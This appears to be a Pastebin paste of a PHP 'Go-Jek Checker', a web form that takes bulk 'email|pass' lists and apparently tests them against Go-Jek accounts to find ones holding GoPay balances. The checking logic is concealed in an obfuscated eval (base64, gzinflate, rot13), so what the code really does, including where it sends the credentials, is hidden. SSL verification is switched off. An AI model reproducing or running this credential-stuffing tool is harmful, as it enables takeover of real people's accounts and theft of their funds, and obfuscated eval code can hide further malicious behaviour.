JakRapp

Go-Jek Checker

Jul 17th, 2016
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.39 KB | None | 0 0
  1. <?php
  2. /*
  3.     Go-Jek Checker by 7unk3r
  4.     Detect GoPay,dll
  5. */
  6.  
  7. # function general #
  8. function curl($url, $var = null) {
  9.     $curl = curl_init($url);
  10.     curl_setopt($curl, CURLOPT_TIMEOUT, 60);
  11.     if ($var != null) {
  12.         curl_setopt($curl, CURLOPT_POST, true);
  13.         curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
  14.     }
  15.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  16.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
  17.     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  18.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  19.     $result = curl_exec($curl);
  20.     curl_close($curl);
  21.     return $result;
  22. }
  23. function xflush() {
  24.     static $output_handler = null;
  25.     if ($output_handler === null) {
  26.         $output_handler = @ini_get('output_handler');
  27.     }
  28.     if ($output_handler == 'ob_gzhandler') {
  29.         return;
  30.     }
  31.     flush();
  32.     if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false) {
  33.         @ob_flush();
  34.         }else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE) {
  35.         @ob_end_flush();
  36.         @ob_start();
  37.     }
  38. }
  39. // SETTING YOUR NAME CHECKER AT HERE!
  40. $checker = (object) array("name" => "Simfoni Hitam", "tag" => "SMFNHTM13");
  41.  
  42. ?>
  43. <!-- Copyright 7unk3r 2k16 -->
  44. <title> Go-Jek Checker - <?=$checker->name;?> </title>
  45. <center>
  46.     <h1>Go-Jek Checker</h1>
  47.     <form action="http://<?=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];?>" method="POST">
  48.         <textarea name="isi" cols="70" rows="10" placeholder="email|pass"></textarea><br><br>
  49.         Delim: <input type="text" name="delim" value="|" style="width:2%">&nbsp;&nbsp;<input type="submit" name="hajar" value="check"><br>
  50.     </form>
  51. <?php
  52.  
  53. if (isset($_POST['hajar'])) {
  54.  
  55.     xflush();
  56.  
  57.     $isi = $_POST['isi'];
  58.     $delim = ($_POST['delim'] == null) ? "|" : $_POST['delim'];
  59.  
  60.     if (empty($isi)) {
  61.         echo 'Form empty!!';
  62.         exit;
  63.     }
  64.  
  65.     $isi = explode("\n",$isi);
  66.  
  67.     eval(str_rot13(gzinflate(base64_decode("bZFRT8MgFIWfu2T/gZDG0oR17871WV/NYuLTQgkw28nobYujbv/dAtVM4xP3Xm6+cw4kXSVAm4GkVlqkJUqdZZCjz+ViuUiS0KEtkkrsBXCnDRAthD6S7PXl6Rlty4zG6uIL+wbzyFd+5H5GyMVZTrOMKmFHEqXyjRdyViqSwqitoymv23wShYa7qgWStuDsSOP6ZjbGde+NmYNwBA9K8fv1uq7rorcnoZnSY6dZ0Rzf12YAcy74wDHFHs+1lFtcBFqB7wLb96GIZtIPWbEJ7o99CyaY8ILxuuncQQ7k24rtEIGRq+O8Ex4vmSiDltZNGPzIzqyqGbqgSSdkLHBspqQBectMkisCJ+Ev5vYPsl2IudMKZEbTkBHEqlS6p8H9qhxln//HjqYTMEOFIrvADydR4rhsKqYsO8Ac7nfW6xc="))));
  68.  
  69. }
  70.  
  71. ?>
  72. </center>
Add Comment
Please, Sign In to add comment